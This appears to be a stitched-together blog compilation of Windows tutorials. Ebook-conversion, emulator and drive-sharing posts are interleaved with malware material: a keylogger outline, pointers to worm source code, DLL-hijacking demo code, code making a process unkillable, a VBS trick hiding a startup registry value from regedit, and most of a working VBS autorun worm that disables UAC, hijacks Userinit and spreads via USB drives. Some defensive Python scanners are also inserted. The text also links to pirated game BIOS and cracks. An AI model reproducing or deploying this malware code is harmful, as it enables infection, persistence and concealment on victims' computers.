How to make Keylogger in VB?

MAKING A KEYLOGGER IN VB6

THE INFORMATION PROVIDED BELOW IS SOLELY FOR EDUCATIONAL PURPOSES AND FOR SERVING THE OBJECTIVE OF THIS BLOG OF PROVIDING INFORMATION TO ITS READERS. THE BLOG IS NOT LIABLE FOR ANY DAMAGE CAUSED BY THE MISUSE OF THE INFORMATION(S) PROVIDED HEREIN

KNOWLEDGE REQUIRED: VISUAL BASIC 6

Let's start:

Open a new Standard EXE Project in VB6

Disable the ControlBox
Set the form's ShowInTaskbar and Visible properties to False
Add a new Timer (named Timer1 by default, and referred to as Timer1 in this post)
Add a new Label (named Label1 by default, and referred to as Label1 in this post)

Add a Module

Convert pdf chm epub djvu to LIT

THIS TUTORIAL SHOWS YOU HOW TO CONVERT PDF TO LIT. FOLLOWING THIS TUTORIAL, YOU CAN CONVERT EBOOK (CHM, EPUB, PDF, ETC) TO MICROSOFT READER LIT FILES


The .LIT file format belongs to Microsoft Reader. Ebooks of this type are small in size compared to other reader formats such as PDF and ePub. Microsoft had released an add-in for Word that could convert Word documents (.DOC) to Microsoft Reader files (.LIT). It turned out to be incompatible with MS Word 2007 and above, and no update had been released to fix it. As I used Microsoft Office 2007, I couldn't use WordRMR, the Microsoft Word add-in, to convert document files to Microsoft Reader files.

And, after hours of searching, I finally found some Converters that could convert Text to LIT Files.

Txt2Lit
Txt2Lit is a command-line tool to convert text files to Microsoft Reader (.LIT) files. The converter has to be invoked from the command line (CMD) and needs a source and a destination file path. It additionally supports setting the author name and book title.

txt2lit [/?] [/1251|/koi8|/866] [/f] [/s] [/a"author"] [/t"title"] [/h["File.DLL"]] <text file> [lit file]
Download Txt2Lit

Michisoft Reader Studio
Michisoft Reader Studio is a graphical application capable of converting HTML files (.HTM), Rich Text files (.RTF), JPG image files (.JPG) and plain text files (.TXT) to Microsoft Reader files (.LIT). Reader Studio can additionally set the cover page, thumbnail, title, author, publisher, identifier, description, date, contributor, source, subject, type and many more.

Download Michisoft Reader Studio

WordRMR
WordRMR is the Microsoft Reader converter add-in for Microsoft Word 2002. It is incompatible with MS Word 2007, but there are some rumors that it works with Microsoft Word 2007 too. There is no guarantee that it will work with Microsoft Word 2007.
Download WordRMR

Calibre
Calibre is the best of all the tools mentioned or referred to in this post. Calibre is free, open-source ebook software for saving, organizing and managing ebooks. It supports various file formats and can convert PDF to LIT, ePub and many more. It also contains an ebook viewer, an ebook manager, etc.

Running Calibre Setup
Calibre Ebook Viewer

Converting to LIT with Calibre:

Run calibre - E-book management[Start -> All Programs -> calibre - E-book Management]
Click Add Ebooks
Click Convert Ebooks
Choose Output Format
Click Ok


Obtain the Converted File from C:\Documents and Settings\$USERNAME$\Calibre Library 
Download Calibre

Additionally you may want to convert LIT Files to other File Formats, if so, you may want to try ABC Amber LIT. ABC Amber LIT Converter is an advanced utility which can convert LIT Files to PDF, CHM, RTF, HLP, DOC, HTML and many more other formats.

Download ABC Amber LIT Converter

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

Setting PCSX2


PCSX2 is the best, most popular and most stable PlayStation 2 emulator available on the web. This is a tutorial on how to set up PCSX2 and get started playing PS2 games on your PC right away.
First, download PCSX2. The current stable version at the time of writing this article is PCSX2 v0.9.8. Download the binary archive like so:
DOWNLOADING PCSX2
PCSX2 needs a copy of the PlayStation 2 BIOS installed in the \bios\ directory to run PS2 games. Since the PS2 BIOS is the private, copyrighted property of SONY, any free distribution or trade of the PS2 BIOS without permission from SONY is considered illegal, and the PCSX2 user is actually supposed to obtain their own copy of the PS2 BIOS by dumping it from a PS2 for use with emulators.
http://forums.ngemu.com/showthread.php?t=84994
But, with a bit of searching on Google, one can easily obtain a copy of the PS2 BIOS. So, here are a couple of download links for the PS2 BIOS:
RapidShare(Link2)

So, lets visit Emu-Russia, and download the BIOS. In the Snapshot below, as you can see I’ve only downloaded the upper one (the Japanese Version) but, you can as well keep both the copies, the Archive is to be extracted and you’ll get a 4 MB BIOS file named scph10000.bin. Now copy the BIN file to X:\PCSX2-INST-DIR\Bios\
DOWNLOADING THE BIOS
Now run pcsx2-r4600.exe in the PCSX2 folder. You'll see the PCSX2 First Time Configuration window. Go ahead and click Next with Use Default Settings checked. Please note that the default configuration may not work on some machines and may need some additional tweaks, as your machine's performance is what matters here. Please refer to this page for the best-performance PCSX2 configuration.
Now, if your DirectX library is not up to date, the PCSX2 Configuration Wizard will ask you to update it.
GSDX UPDATE
So, go ahead and download the latest version of DirectX from the Microsoft Download Center.
MICROSOFT DIRECTX DOWNLOAD
The next window you will see is the BIOS Selection window. If you have not yet downloaded the BIOS and installed it in your \bios\ folder, you will find that the list box is empty.
 
So, download a copy of BIOS and install it in the \bios\ Folder. Remember that I have already mentioned earlier in this post that I’ve downloaded the Japanese Version of BIOS from Emu-Russia. So, if you too installed the Japanese Version, then you should see the following:
JAPANESE BIOS SELECTION
Then, you should click Finish and you should see the PCSX2 Main Window along with the Console and or Program Log Window like so:
PCSX2 MAIN WINDOW
Then click CDVD -> Iso Selector -> Browse and you should see the following window:
PCSX2 BROWSE CDVD IMAGE
And, you should see the game running right away.
RUNNING MANHUNT IN PCSX2
PLEASE NOTE THAT THIS IS JUST A TUTORIAL, A GUIDE FOR BEGINNERS TRYING TO SETUP PCSX2. AND, SOME OF THE STEPS PROVIDED HERE (MAY) HAVE NOT BEEN FOLLOWED AT THE TIME OF WRITING THIS ARTICLE

HERE IS AN UPDATED VERSION OF THIS POST.


Learn VBScripting - How to learn Visual Basic Scripting ?

LEARN VISUAL BASIC SCRIPTING
What you will need:

A Good Script Editor
The first thing you'll need is a good editor. The best you'll find around is the one called VBSEdit. VBSEdit is a commercial VBScript editor, but the trial period never expires, and you will find that VBSEdit is a perfect companion for VBScripters.
The VBSEdit package also comes with an HTA editor. It has tons of samples and good text-editor features such as syntax highlighting, code completion and an object browser; it also supports setting breakpoints and features a debugger. With it, you can even test-run the script on the go.

VBSEdit
VBSEdit Trial Info-Box
VBSEdit Samples
VBSEdit Code Completion
An Ebook for learning VB Scripting

VBSEdit also contains a compiled help file called Script56. Script56 is a perfect companion for learning Visual Basic Scripting: a perfect guide for beginners and, at the same time, a perfect reference for average and advanced scripters alike.

You can additionally read a Book called Microsoft VBScript Step By Step from Microsoft Press which is the best that is available for learning VBScript. It teaches Visual Basic Scripting Step By Step.

MS VBSCRIPT STEP BY STEP
MS VBSCRIPT STEP BY STEP in Amazon


PLEASE NOTE THAT AVIRA MAY FALSELY DETECT VBSEDIT.EXE AS MALWARE AND PREVENT ANY ACCESS TO IT. PLEASE BE AWARE THAT IT IS JUST A FALSE POSITIVE

Avira False Positive

Learn how viruses work and defend yourself against them here.


Manhunt Game - Download for PC


Manhunt is a single-player stealth horror game. There are 20 levels, of which the last 3 are bonuses. The game's main character is James Earl Cash. The game becomes bloodier as it progresses. The first level offers quick, bloodless ways of executing enemies (suffocation with a plastic bag), and the game progressively moves on to wires for stealth executions, nail guns, revolvers, blades, baseball bats, glass shards, etc. The player has to hide in the shadows and execute the enemies without losing HP or letting an enemy raise the alarm.



Minimum Requirements:
256 MB Physical Memory (RAM)
32 MB Video Memory
900 MB HDD Space
This is a Torrent Link and this one is a Mediafire link(190 MB).

Please Note that Avira may falsely detect Manhunt.exe as TR/Rootkit.Gen. It is only a false-positive.

And here are the screenshots of the Game:


The Player carrying the dead body of an enemy (called hunter in the game)
This game has been banned in a number of countries due to excessive gore and violence, and its possession may be considered an offense in those countries.

Manhunt Crack for Windows Vista



THE REAL CREDIT GOES TO THE RESPECTIVE UPLOADERS


How to-Map network drive in XP? Share Drives & Folders in Windows OS

1. Make sure both your PC and the PC you want to share your Drive / Folder with are on the same LAN.
2. Both computers must have the same Workgroup name ([MY COMPUTER] -> [PROPERTIES] -> [COMPUTER NAME] -> [WORKGROUP]) (optional), and password-protected sharing must be off.


Turn Password Protecting off.
3. Don't forget to obtain the name of the computer you are connecting to.
4. Right-click the Folder / Drive icon you want to share. Now, go to the Sharing tab and:
    (a) Click "Share this folder on the network"
    (b) Check "Allow network users to change my files"
5. Check option 4.(b) only if you want to be able to write to the shared Drive from the other PC you are sharing the Drive / Folder with. And, don't forget the 'Share Name', we will need it too. The same goes for a folder.
6. Now, open My Computer on the second PC and click [TOOLS] -> [MAP NETWORK DRIVE]. A new window called 'Map Network Drive' will show up.
7. Now, choose any unassigned drive letter and type:
   \\COMPUTERNAME-TO-SHARE-WITH\Share-Name
8. Click [FINISH]. And, it will show up as a Network Drive.


W32.Induc Worm - Sourcecode


AT LEAST BASIC KNOWLEDGE OF OBJECT PASCAL IS REQUIRED. THIS SOURCE CODE IS FOR THOSE WHO ARE CURIOUS ABOUT HOW THE W32.INDUC WORM ACTUALLY WORKS.
This is a Delphi virus which infects executables at compile time.
W32/Induc-C is a virus infecting executable files and core source units of the Delphi compiler.
W32/Induc-C includes functionality to spread via removable drives.
Please note that the infection of Delphi installations means that infected software developers will be producing software infected at compile time. Therefore, as with Mal/Induc-A and W32/Induc-A, there may be detections of W32/Induc-C and Mal/Induc-D on software published by legitimate software houses. These are not false positives. Customers with infected software should contact the software vendor to inform them of the infection and ask the vendor to clean up their Delphi installation and compile new, clean versions of the software.
Source: Sophos
W32.Induc is a worm making rounds these days, the worm is known to attack the software development phase by putting its malicious code in to the Delphi library files thus adding itself to the compilation process. Thereafter, any file compiled with the infected Delphi compiler will also be infected.
Source: McAfee
And here is the Page with the Source-code.


MyDoom.A - Sourcecode of MyDoom worm

Discovered: January 26, 2004
Updated: February 13, 2007 12:16:57 PM
Also Known As: W32.Novarg.A@mm, W32/Mydoom@MM [McAfee], WORM_MIMAIL.R [Trend], Win32.Mydoom.A [Computer Assoc], W32/Mydoom-A [Sophos], I-Worm.Novarg [Kaspersky]
Type: Worm
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


W32.Mydoom.A@mm (also known as W32.Novarg.A) is a mass-mailing worm that arrives as an attachment with the file extension .bat, .cmd, .exe, .pif, .scr, or .zip.

When a computer is infected, the worm sets up a backdoor into the system by opening TCP ports 3127 through 3198, which can potentially allow an attacker to connect to the computer and use it as a proxy to gain access to its network resources.

In addition, the backdoor can download and execute arbitrary files.
There is a 25% chance that a computer infected by the worm will perform a Denial of Service (DoS) on February 1, 2004 starting at 16:09:18 UTC, which is also the same as 08:09:18 PST, based on the machine's local system date/time. If the worm does start the DoS attack, it will not mass mail itself. It also has a trigger date to stop spreading/DoS-attacking on February 12, 2004. While the worm will stop on February 12, 2004, the backdoor component will continue to function after this date.

Source: Symantec
MyDoom.A Sourcecode.
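Symantec's description above gives a defender one concrete network indicator: TCP listeners on ports 3127 through 3198. As an added example (not part of the original post), here is a small Python check that parses netstat-style output and reports listening sockets in that range grouped by PID. The sample output is constructed in the shape of `netstat -ano` on Windows, not captured from a real host.

```python
"""Report TCP listeners in the port range Mydoom.A's backdoor opens (3127-3198).

Added example (not from the original post). The port range is from the Symantec
text quoted above; SAMPLE_NETSTAT is constructed in the shape of `netstat -ano`
output, not captured from a real host.
"""
from collections import defaultdict

BACKDOOR_PORTS = range(3127, 3199)  # 3127 through 3198 inclusive

SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       832
  TCP    0.0.0.0:3127           0.0.0.0:0              LISTENING       1488
  TCP    0.0.0.0:3128           0.0.0.0:0              LISTENING       1488
  TCP    [::]:3130              [::]:0                 LISTENING       1488
  TCP    192.168.1.5:1045       10.0.0.7:80            ESTABLISHED     2212
  TCP    0.0.0.0:3199           0.0.0.0:0              LISTENING       604
  UDP    0.0.0.0:500            *:*                                    1200
"""


def parse_netstat(text):
    """Turn netstat -ano style lines into dicts; UDP rows carry no state column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue  # header, blank or unknown line
        proto, local = parts[0], parts[1]
        host, _, port = local.rpartition(":")  # works for IPv4 and [::] forms
        state = parts[3] if proto == "TCP" and len(parts) >= 5 else ""
        rows.append({"proto": proto, "host": host, "port": int(port),
                     "state": state, "pid": int(parts[-1])})
    return rows


def find_backdoor_listeners(text, ports=BACKDOOR_PORTS):
    """Map PID -> sorted list of listening TCP ports that fall inside `ports`."""
    by_pid = defaultdict(list)
    for row in parse_netstat(text):
        if row["proto"] == "TCP" and row["state"] == "LISTENING" and row["port"] in ports:
            by_pid[row["pid"]].append(row["port"])
    return {pid: sorted(p) for pid, p in by_pid.items()}


if __name__ == "__main__":
    for pid, ports in find_backdoor_listeners(SAMPLE_NETSTAT).items():
        print(f"PID {pid} listens on backdoor-range ports {ports}")
```

A single listener in the range is not proof on its own (the range overlaps ordinary ephemeral ports), so the check groups by PID: one process holding several consecutive ports in that band is the pattern worth pulling the image path and start time for.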


DLL Hijacking

THIS ARTICLE ASSUMES THAT THE READER IS FAMILIAR WITH WINDOWS PROGRAMMING


Due to a vulnerability commonly known as DLL hijacking, many programs will load and execute a malicious DLL contained in the same folder as a file on a remote system. The vulnerability was discovered by HD Moore, who has published an exploit for the open-source based penetration testing software Metasploit.
Source: Wikipedia

DLL hijacking, also known as DLL path injection, is a very popular method in which an application known to be vulnerable is (ab)used as the loader of a malicious DLL. It works by placing a DLL with the same name (and exporting the same functions) as the legitimate one in the directory of the application, or of a file the application is going to open. The idea is that the application loads our library into its memory instead of the original, through the LoadLibrary() function exported by KERNEL32.DLL, and so runs the code in the DLL's entry point (DllMain or DllEntryPoint), which contains our payload.

#include <windows.h>

/*           COMPILE(D) WITH LCC   */

BOOL WINAPI DllMain(HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpvReserved)
{
                if (dwReason == DLL_PROCESS_ATTACH)
                {
                                MessageBox(0,"DLL Attached","DLL Message", 0);
                }
                else if (dwReason == DLL_PROCESS_DETACH)
                {
                                MessageBox(0,"DLL Detaching","DLL Message", 0);
                }
                if (dwReason == DLL_THREAD_ATTACH)
                {
                                MessageBox(0,"DLL Thread Attached","DLL Message", 0);
                }
                else if (dwReason == DLL_THREAD_DETACH)
                {
                                MessageBox(0,"DLL Thread Detaching","DLL Message", 0);
                }
return TRUE;
}
''  COMPILE AS: fbc PATH-TO-FILE.BAS -dll -Wl " -entry _DllEntryPoint@12"

#include "windows.bi"
Function DllEntryPoint stdcall Alias "DllEntryPoint" (hInstDLL As HINSTANCE, _
                                dwReason As DWORD, lpvReserved As LPVOID) As BOOL Export
                if (dwReason = DLL_PROCESS_ATTACH) then
                                MessageBox(0,"DLL Attached","DLL Message", 0)
                elseif (dwReason = DLL_PROCESS_DETACH) then
                                MessageBox(0,"DLL Detaching","DLL Message", 0)
                elseif (dwReason = DLL_THREAD_ATTACH) then
                                MessageBox(0,"DLL Thread Attached","DLL Message", 0)
                else
                                MessageBox(0,"DLL Thread Detaching","DLL Message", 0)
                End if
return TRUE
End Function     
Of the two samples above, the first is to be compiled as C and the second as FreeBASIC.

PROCEDURES FOR DLL HIJACKING:

First, find a vulnerable program and the name of the DLL it is bound to load. A list of vulnerable programs along with their associated DLL names can be found here.

One of the vulnerable programs was VideoLAN VLC Media Player. The software has since been patched, but this does not mean that the old versions are immune: VLC Media Player v1.0.3 is vulnerable, and so is a program called Xilisoft. Both of them load the same DLL, Wintab32.DLL. The Visual Basic 6 IDE is also vulnerable; it loads a DLL called vb6ide.dll.

TRYING OUT DLL HIJACKING:

This one is for Videolan VLC Media Player V1.0.3:
1. Install VLC Media Player (unpatched version). Note that VLC has an official statement regarding the patching of the vulnerability, and the software is no longer vulnerable.
2. Copy an MP3 file to some folder on the computer (e.g. X:\SOMEFOLDER\SOMEFILE.MP3).
3. Compile the above code to a DLL, rename the DLL to WINTAB32.DLL, and now open the MP3 file. You should see a MessageBox pop up saying DLL ATTACHED.
Note:
1. It is up to you to either export all the functions or simply compile only the malicious code. Depending on the software and the situation, the program may crash after your DLL has been loaded if you don't export all the functions that the program is known to use.
2. The DLL will be loaded in the above scenario and the MP3 file will keep on playing in VLC v1.0.3.
3. Just to try the demo in VLC, it is not necessary to have a real MP3 file. You may create a text document, change its extension from .TXT to .MP3, and load that file.
And, you should see the MessageBox like in the snapshot above.
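The defensive counterpart to the procedure above, as an added example that is not part of the original post: a Python scan that walks a user-writable directory tree (a Downloads or shared-media folder, where no application DLL belongs) and reports DLL files whose names match the hijack candidates the post names (wintab32.dll, vb6ide.dll) or that sit beside user data files such as MP3s. The watchlist names come from the post; the data-extension set is a demo choice, and the sample tree is constructed in a temporary directory.

```python
"""Scan a user-writable directory tree for DLLs planted for DLL hijacking.

Added example (not from the original post). Assumptions: the watchlist names
come from the post (wintab32.dll, vb6ide.dll); the data-file extension set is
a demo choice; the sample tree is constructed in a temporary directory.
"""
import os
import tempfile

# DLL names the post says vulnerable applications resolve from the document's folder.
WATCHLIST = {"wintab32.dll", "vb6ide.dll"}

# Extensions of files a user opens by double-click. A DLL next to them is suspect,
# because DLLs belong in the application directory, not the document directory.
DATA_EXTS = {".mp3", ".avi", ".mkv", ".doc", ".pdf", ".txt"}


def find_planted_dlls(root, watchlist=WATCHLIST, data_exts=DATA_EXTS):
    """Return sorted [(path, reason)] for DLLs under `root` that look planted."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lowered = {name: name.lower() for name in files}
        has_data = any(os.path.splitext(low)[1] in data_exts for low in lowered.values())
        for original, low in lowered.items():
            if not low.endswith(".dll"):
                continue
            if low in watchlist:
                reason = "DLL name is a known hijack target"
            elif has_data:
                reason = "DLL stored beside user data files"
            else:
                continue  # a DLL in a folder of executables is the normal case
            findings.append((os.path.join(dirpath, original), reason))
    return sorted(findings)


def build_demo_tree():
    """Construct a sample tree: a music folder with a planted WINTAB32.DLL next to
    an MP3, and an application folder whose helper.dll is where a DLL belongs."""
    root = tempfile.mkdtemp(prefix="dllhijack-demo-")
    music = os.path.join(root, "Music")
    app = os.path.join(root, "SomeApp")
    os.makedirs(music)
    os.makedirs(app)
    for path in (os.path.join(music, "song.mp3"),
                 os.path.join(music, "WINTAB32.DLL"),
                 os.path.join(app, "app.exe"),
                 os.path.join(app, "helper.dll")):
        with open(path, "wb"):
            pass  # empty placeholder files are enough for a name-based scan
    return root


if __name__ == "__main__":
    for path, reason in find_planted_dlls(build_demo_tree()):
        print(f"{reason}: {path}")
```

The scan is name-based, so it complements rather than replaces the real fix, which belongs to the application: load DLLs by full path, or restrict the search order with SetDllDirectory or the LOAD_LIBRARY_SEARCH_* flags of LoadLibraryEx, so that the current working directory is never consulted.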

Make Process unstoppable


Some of the ways to make a process un-terminable are:
  1. Rename your process to one of these: smss.exe, lsass.exe or csrss.exe. Note that this method only works on pre-Windows 7 releases; your process will simply get terminated when you try it on Windows 7. On Vista or earlier, one will see the ACCESS DENIED error when trying to terminate a process with any of the above names.
  2. Use the Win32 API call RtlSetProcessIsCritical(). It is exported by NTDLL.DLL, and the operating system will suffer a Blue Screen of Death if the process is terminated.
  3. Use the API called SetKernelObjectSecurity(); its effect will be the same as the first option, one will see ACCESS DENIED.
CSRSS.EXE in a directory other than System32 looks suspicious to AVs.


 #include "windows.bi"

Dim As HMODULE hNTDLL = LoadLibrary("Ntdll")
Dim RtlCritical As Function (As BOOL, As BOOL, As BOOL) As Long
    RtlCritical = Cast(Long, GetProcAddress(hNTDLL, "RtlSetProcessIsCritical"))
    Dim As HANDLE hToken
    Dim As luid LUID
    Dim As TOKEN_PRIVILEGES tkpriv
    ZeroMemory(@tkpriv, sizeof(tkpriv))
    If (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, @hToken)) Then
        If (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, @luid)) Then
            tkpriv.PrivilegeCount = 1  
            tkpriv.Privileges(0).Luid = luid
            tkpriv.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
            AdjustTokenPrivileges(hToken,FALSE, @tkpriv, sizeof(tkpriv), NULL, NULL)
            CloseHandle(hToken)
            RtlCritical(TRUE, NULL, FALSE)
        Else
            CloseHandle(hToken)
        EndIf
    EndIf  
FreeLibrary(hNTDLL)
The above is the Freebasic Version of RtlSetProcessIsCritical(). Under UAC, you will need to run as Administrator or the Code won't work. The result is a BSOD in case the Process is terminated.
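The last remark above, that a csrss.exe outside System32 looks suspicious, is the check an analyst can automate. As an added example (not from the original post), here is a Python function that takes a process list of (pid, image path) pairs and flags any that borrow one of the three core system process names but do not run from %SystemRoot%\System32. It assumes C:\Windows\System32 as the genuine location, and the process list is constructed sample data.

```python
"""Flag processes that borrow a core system process name but run from the wrong directory.

Added example (not from the original post). Assumption: genuine smss.exe,
lsass.exe and csrss.exe load from %SystemRoot%\\System32, taken as
C:\\Windows\\System32 here; SAMPLE_PROCESSES is constructed sample data.
"""
import ntpath

PROTECTED_NAMES = {"smss.exe", "lsass.exe", "csrss.exe"}  # names the post says are renamed to
SYSTEM32 = r"C:\Windows\System32"


def normalise(path):
    """Case-fold, convert forward slashes and collapse '..' so path tricks don't
    defeat the directory comparison (ntpath handles Windows paths on any OS)."""
    return ntpath.normpath(path.replace("/", "\\")).lower()


def find_masquerading(processes, system32=SYSTEM32):
    """processes: iterable of (pid, image_path). Returns [(pid, image_path)] whose
    image name is one of PROTECTED_NAMES but whose directory is not System32."""
    expected = normalise(system32)
    hits = []
    for pid, image in processes:
        norm = normalise(image)
        if ntpath.basename(norm) in PROTECTED_NAMES and ntpath.dirname(norm) != expected:
            hits.append((pid, image))
    return hits


SAMPLE_PROCESSES = [
    (4, r"C:\Windows\System32\smss.exe"),                    # genuine
    (616, r"C:/WINDOWS/system32/csrss.exe"),                 # genuine, odd casing and slashes
    (1320, r"C:\Users\alice\AppData\Local\Temp\csrss.exe"),  # renamed process in %TEMP%
    (2044, r"C:\Windows\System32\..\Temp\lsass.exe"),        # '..' trick, really C:\Windows\Temp
    (3100, r"C:\Program Files\Editor\editor.exe"),           # unrelated
]

if __name__ == "__main__":
    for pid, image in find_masquerading(SAMPLE_PROCESSES):
        print(f"PID {pid}: {image} uses a protected name outside System32")
```

The check covers only the first technique in the list: RtlSetProcessIsCritical() and SetKernelObjectSecurity() leave the image path untouched, so those need a different signal (the critical flag on the process, or a DACL that denies PROCESS_TERMINATE to administrators).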


Hide Registry Key

The hiding of a registry key in this article is done by exploiting a vulnerability in REGEDIT. It is triggered by creating a value whose name is longer than 260 bytes.
This vulnerability affects only RegEdit and RegEdit32, not other software such as CCleaner and regutil, as they use a buffer longer than 260 bytes, which keeps the value visible to them. Since RegEdit uses a buffer of exactly 260 bytes, we create a value with a name of 261 characters or more and it hopefully becomes invisible. This is a coincidental design flaw rather than a bug. This trick should make our value invisible and, at the same time, run the dummy file (which in the real world would be the malware) faithfully at startup. This vulnerability is reportedly being exploited by malware in the wild.

So, below is the V(isual) B(asic) S(cript) Code that should do the trick:

Const Alphabets = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
Dim Shell, my_lengthy_string, i
Set Shell = CreateObject("WScript.Shell")
my_lengthy_string = Alphabets
For i = 0 to 10
                my_lengthy_string = my_lengthy_string & Alphabets
Next
Shell.RegWrite "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run\" _
                & my_lengthy_string, "C:\DUMMY.EXE", "REG_SZ"
Set Shell = Nothing
And you can clearly see the consequence in the Snapshot above. The Registry Key in Red Highlight is produced by the VBS Code posted above. The Hidden Registry Key was caught by Anti-Rootkit Tool called GMER. While the same Registry Key is nowhere to be found in the RegEdit.
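GMER finds the value because it reads the key with a larger buffer, and the same idea can be scripted. As an added example (not part of the original post), here is a Python check that reports Run-key value names longer than the 260-character buffer regedit uses. The 260 limit and the Run key path come from the post; the sample values are constructed (the 312-character name is exactly what the VBS loop above builds: the alphabet once plus 11 appends), and the winreg reader is an optional live path for Windows hosts.

```python
"""Find Run-key value names longer than the 260-character buffer regedit uses.

Added example (not from the original post). The 260 limit and the Run key path
are from the post; SAMPLE_VALUES is constructed; read_run_values() is an
optional live reader that only does anything on Windows (winreg available).
"""
REGEDIT_NAME_BUFFER = 260
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

# Constructed sample: one ordinary entry, one name built the way the post's VBS
# builds it (26 * 12 = 312 characters), and one exactly at the 260 boundary.
SAMPLE_VALUES = [
    ("OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (ALPHABET * 12, r"C:\DUMMY.EXE"),
    ("B" * REGEDIT_NAME_BUFFER, r"C:\boundary.exe"),
]


def find_oversized_names(values, limit=REGEDIT_NAME_BUFFER):
    """values: iterable of (name, data). Return [(name_length, name_prefix, data)]
    for names longer than `limit`; these are the ones regedit cannot display."""
    return [(len(name), name[:16] + "...", data)
            for name, data in values if len(name) > limit]


def read_run_values(use_hklm=False):
    """Enumerate the Run key with winreg on Windows; return [] elsewhere."""
    try:
        import winreg
    except ImportError:
        return []
    hive = winreg.HKEY_LOCAL_MACHINE if use_hklm else winreg.HKEY_CURRENT_USER
    values = []
    with winreg.OpenKey(hive, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _kind = winreg.EnumValue(key, index)
            except OSError:
                break  # no more values
            values.append((name, data))
            index += 1
    return values


if __name__ == "__main__":
    live = read_run_values() + read_run_values(use_hklm=True)
    for length, prefix, data in find_oversized_names(live or SAMPLE_VALUES):
        print(f"{length}-char value name {prefix} -> {data}")
```

Because EnumValue is not bound by regedit's display buffer, the 312-character name comes back intact, and the data column (the program launched at logon) is what to triage.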

Learn how you can make a Virus in VBS


How to make Autorun Virus in VBScript

THIS IS A BASIC FRAMEWORK OF A VBS AUTORUN VIRUS. THIS IS FOR THOSE WHO WANT TO KNOW HOW AUTORUN VIRUSES ACTUALLY WORK SO THAT THEY CAN DEFEND THEMSELVES AGAINST SUCH THREATS
THIS IS A BASIC FRAMEWORK OF A VBS AUTORUN WORM DETECTED AS GENERIC.SCRIPTWORM, WORM/VBS, VBS.SASAN.A, VBS.SOLOW AND VBS:AGENT-JF[WRM]. THE VIRUS NORMALLY WORKS UNDER PRE-WINDOWS 7 RELEASES (UP TO WINDOWS VISTA) BECAUSE AUTORUN.INF DOESN'T WORK FOR USB DRIVES IN WINDOWS 7. BUT, IF MANUALLY RUN (FROM WSCRIPT) THEN IT CAN INFECT WINDOWS 7 TOO. IF THE READER WANTS TO TEST IT, S/HE MAY DO SO ONLY IN A SAFE ENVIRONMENT (UNDER VIRTUALBOX OR VIRTUAL PC) ISOLATED FROM THE HOST ENVIRONMENT TO PREVENT SELF-INFECTION


Option Explicit
Const script_eng = "wscript.exe -e:VBScript "
Dim i
Dim fso, Shell, tfile
Dim HIVES
Dim Tempdir, Systemdir
Dim myfolder, myfile, mypath, mycode, auto_inf
Dim userinit, device

On Error Resume Next

Set Shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.Filesystemobject")
                                Set myfile = fso.GetFile(WScript.ScriptFullName)
                                mycode = myfile.OpenAsTextStream(1, - 2).ReadAll
                                Set myfolder = myfile.ParentFolder
                                If (Right(myfolder, 1) <> "\") Then _
                                                   myfolder = myfolder & "\"
                                mypath = myfolder & myfile.Name
                                If (myfile.ParentFolder = myfile.Drive.Path & "\RECYCLER") Then _
                                             Shell.Run("explorer.exe " & myfile.Drive.Path & "\")
                                Set myfile = Nothing
                                HIVES = Array("HKEY_CURRENT_USER\", "HKEY_LOCAL_MACHINE\")
                                Set Systemdir = fso.GetSpecialFolder(1)              
                                Set Tempdir = fso.getspecialfolder(2)
                                userinit = Systemdir & "\userinit.exe," & Systemdir & "\" _
                                                                  & script_eng & Systemdir & "\thumb.db"
                                                                 
auto_inf = "[AUT" & "ORUN]" & vbCrLf
auto_inf = auto_inf & "ShellEx" & "ecute=" & script_eng & "RECYCLER\thumb.db"
auto_inf = auto_inf & vbcrlf & "Action=Ope" & "n folder t" & "o view files" & vbCrLf
auto_inf = auto_inf & "Shell\Forma" & "t...\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\" & "Open\" & "Comman" & "d=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\Expl" & "ore\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "ico" & "n=shell32.dll,4"
copy_in_system()
 Do
         regcreate()        
         infect_devices()
         self_regen()
                               
         If ((myfolder = Systemdir & "\") Or (myfolder = Tempdir & "\")) Then _
                                 WScript.Sleep(1000)
Loop While ((myfolder = Systemdir & "\") Or (myfolder = TempDir & "\"))
Virus residing in the System Folder


Function regcreate()
For i = 0 To 1
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", userinit, "REG_SZ"
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AudioSvc", script_eng & Tempdir & "\thumb.db", "REG_SZ"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", 0, "REG_DWORD"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\" _
     & "Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
Next
End Function
The Registry-Key modified by the Worm
Function infect_devices()
For Each device In fso.Drives
      If ((device.DriveLetter <> "A") And (device.DriveLetter <> "B")) Then
            If ((device.DriveType = 1) Or (device.DriveType = 3)) Then
                If (device.IsReady) then
                     If (fso.FolderExists(device.Path & "\Autorun.inf")) Then _
